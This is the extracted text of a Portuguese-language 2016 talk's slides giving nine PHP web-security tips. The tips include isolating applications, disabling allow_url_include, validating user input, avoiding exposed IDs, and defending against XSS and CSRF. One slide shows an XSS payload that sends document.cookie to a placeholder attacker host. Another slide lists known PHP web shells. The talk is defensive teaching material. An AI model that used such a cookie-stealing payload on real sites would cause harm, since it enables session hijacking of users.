Este documento fornece 9 dicas de segurança para PHP e aplicações web, incluindo remover informações desnecessárias, isolar aplicações, desabilitar recursos externos, tratar dados de usuários, evitar IDs primárias, prevenir cross-site scripting e forgery, e usar checksums e controle de versão.

1. Dicas de segurança para
o PHP e seus amigos
7º PHPMG TALKS - 2016

2. Eu? Sou este ai
https://github.com/joubertredrat
https://br.linkedin.com/in/joubertredrat
https://twitter.com/joubertredrat
http://www.vivaolinux.com.br/~joubertredrat
* no meu Linkedin explica o
porque do apelido RedRat
https://creativecommons.org/licenses/by-sa/4.0/
Dicas de segurança para o PHP e seus amigos

3. Dicas de segurança para o PHP e seus amigos
INFORMAÇÃO É PODER
QUEM TEM INFORMAÇÃO
DOMINA O MUNDO

4. Dicas de segurança para o PHP e seus amigos
1ª DICA
REMOVER INFORMAÇÕES DESNECESSÁRIAS

5. Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

6. Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

7. Dicas de segurança para o PHP e seus amigos
2ª DICA
ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

8. Dicas de segurança para o PHP e seus amigos
2ª DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

9. Dicas de segurança para o PHP e seus amigos
3ª DICA
DESABILITAR OU EVITAR RECURSOS EXTERNOS

10. Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
R57 R6
C99Shell C100Shell
bypass Tool25
b374k
GaZa

11. Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
http://php.net/allow-url-include

12. Dicas de segurança para o PHP e seus amigos
4ª DICA
USAR URL AMIGÁVEIS E EVITAR QUERY STRING

13. Dicas de segurança para o PHP e seus amigos
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

14. Dicas de segurança para o PHP e seus amigos
5ª DICA
TRATAR OS DADOS VINDOS DO USUÁRIO
MESMO ASSIM QUER USAR QUERY STRING?
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

15. Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
filter_var
mysqli_stmt_bind_param
PDOStatement::bindValue
DateTime::getLastErrors();
is_(bool,callable,numeric,float,string,object,etc)
Libs no Packagist

16. Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
Quer fazer testes?
sqlmap Zed Attack Proxy “ZAP”
BeEF sqlninja

17. Dicas de segurança para o PHP e seus amigos
6ª DICA
EVITAR O USO DA PRIMARY KEY OU ID

18. Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID
• UUID
• GUID
• MD5/CRC32/SHA1/SHA256
• Hash ou Ofuscamento

19. Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID

20. Dicas de segurança para o PHP e seus amigos
7ª DICA (PRIMA DA 5ª DICA)
CROSS-SITE SCRIPTING

21. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING

22. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING

23. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING

24. Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>

25. Dicas de segurança para o PHP e seus amigos
8ª DICA
CROSS SITE REQUEST FORGERY

26. Dicas de segurança para o PHP e seus amigos
8ª DICA - CROSS SITE REQUEST FORGERY

27. Dicas de segurança para o PHP e seus amigos
9ª DICA
USAR CHECKSUM OU O VCS AO SEU FAVOR

28. Dicas de segurança para o PHP e seus amigos
9ª DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR

29. Dicas de segurança para o PHP e seus amigos
ACABOU AS DICAS POR HOJE
PERGUNTAS?
FALA QUE NÃO
TEM 